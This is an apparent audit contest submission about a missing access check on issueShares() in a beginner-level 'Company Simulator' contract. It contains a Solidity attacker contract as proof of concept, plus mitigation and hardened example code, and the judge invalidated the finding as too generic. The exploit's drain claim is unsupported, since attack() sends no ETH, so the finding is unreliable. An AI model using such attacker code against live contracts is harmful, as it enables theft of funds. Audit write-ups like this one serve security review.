Company Simulator

First Flight #51
Tags: Beginner Friendly, DeFi

Submission Details
Impact: high
Likelihood: high
Status: Invalid

Unchecked Share Dilution — Allows Attacker to Inflate Ownership and Drain Dividends

Root + Impact

Description

  • The system should only allow new share issuance (minting) proportional to actual capital contribution or authorized actions from the company owner. Each shareholder’s percentage of ownership should remain consistent unless new equity is legitimately added.

  • The issueShares() function does not verify whether the caller is authorized or whether the total share supply cap has been reached. This allows any external user to mint new shares to themselves, artificially inflating their ownership and enabling theft of future dividends and voting power.

// Root cause in the codebase with @> marks to highlight the relevant section
function issueShares(uint256 _amount) external {
    // @> No access control — any caller can execute this
    // @> No validation on totalShares or user limits
    shares[msg.sender] += _amount;
    totalShares += _amount;
}

Risk

Likelihood:

  • The vulnerability triggers whenever the function is publicly callable and no owner or governance check exists.

It occurs during any normal operational phase since share issuance can be called at any time by any address.

Impact:

  • An attacker can mint arbitrary shares and claim nearly all dividends during distributeDividends().

This effectively drains all ETH or token profits from the system and permanently corrupts shareholding fairness.

Proof of Concept

When attack() is executed, the attacker becomes the dominant shareholder by minting unlimited shares and subsequently drains all distributed dividends.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal interface to the vulnerable contract (only the two functions the PoC uses)
interface ICompanySimulator {
    function issueShares(uint256 _amount) external;
    function distributeDividends() external payable;
}

contract Attacker {
    ICompanySimulator public target;

    constructor(address _target) {
        target = ICompanySimulator(_target);
    }

    function attack() external payable {
        // Step 1: Mint unlimited shares to self
        // (half of uint256 max leaves headroom so totalShares += _amount does not overflow)
        target.issueShares(type(uint256).max / 2);
        // Step 2: Trigger dividend distribution after minting; this contract now holds
        // almost all of totalShares, so almost all of the payout lands in receive()
        target.distributeDividends();
    }

    // Receives all distributed ETH
    receive() external payable {}
}

Recommended Mitigation

  • Implement strict access control (e.g., onlyOwner or governance modifier) on share issuance and burning functions.

  • Add a maximum total supply cap to prevent dilution beyond the intended number of shares.

function issueShares(uint256 _amount) external onlyOwner {
    // MAX_SUPPLY is a constant fixed by the company; onlyOwner restricts minting to the owner
    require(totalShares + _amount <= MAX_SUPPLY, "Max supply exceeded");
    shares[msg.sender] += _amount;
    totalShares += _amount;
}
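A fuller version of the two mitigations, added here as an example and not the audited contract's code: an owner-only, capped issueShares() together with a pull-based, per-share dividend accumulator so that shares minted after a distribution earn nothing from it. The contract name, the MAX_SUPPLY value, the `to` parameter, the claim()/pending() functions and ETH-denominated dividends are all assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical hardened ledger (added example, not the audited contract).
// Assumptions: a single owner mints, a fixed MAX_SUPPLY, dividends paid in ETH.
contract CappedShareLedger {
    uint256 public constant MAX_SUPPLY = 1_000_000;
    uint256 private constant SCALE = 1e18;
    address public immutable owner;
    uint256 public totalShares;
    mapping(address => uint256) public shares;
    // Pull-based dividends: a running ETH-per-share accumulator plus a per-holder
    // checkpoint, so shares minted after a distribution earn nothing from it.
    uint256 public accPerShare;
    mapping(address => uint256) private settledUpTo;
    error NotOwner();
    error CapExceeded(uint256 requested, uint256 remaining);
    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner();
        _;
    }

    constructor() { owner = msg.sender; }
    // Fix 1: only the owner may mint. Fix 2: totalShares can never exceed the cap.
    function issueShares(address to, uint256 amount) external onlyOwner {
        uint256 remaining = MAX_SUPPLY - totalShares;
        if (amount > remaining) revert CapExceeded(amount, remaining);
        _settle(to); // pay what is already owed before the balance changes
        shares[to] += amount;
        totalShares += amount;
    }

    function distributeDividends() external payable {
        require(totalShares > 0, "no shareholders");
        accPerShare += (msg.value * SCALE) / totalShares; // dust rounds down, stays in contract
    }

    function claim() external { _settle(msg.sender); }
    function pending(address who) public view returns (uint256) {
        return (shares[who] * (accPerShare - settledUpTo[who])) / SCALE;
    }

    function _settle(address who) internal {
        uint256 owed = pending(who);
        settledUpTo[who] = accPerShare; // effects before interaction
        if (owed == 0) return;
        (bool ok, ) = who.call{value: owed}("");
        require(ok, "ETH transfer failed");
    }
}
```

A mint from any non-owner address reverts with NotOwner, and a mint that would push totalShares past MAX_SUPPLY reverts with CapExceeded, which are exactly the two checks the audited function lacks.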
Updates

Lead Judging Commences
0xshaedyw (Lead Judge), 5 days ago

Submission Judgement Published
0xshaedyw (Lead Judge), 3 days ago
Invalidated
Reason: Too generic
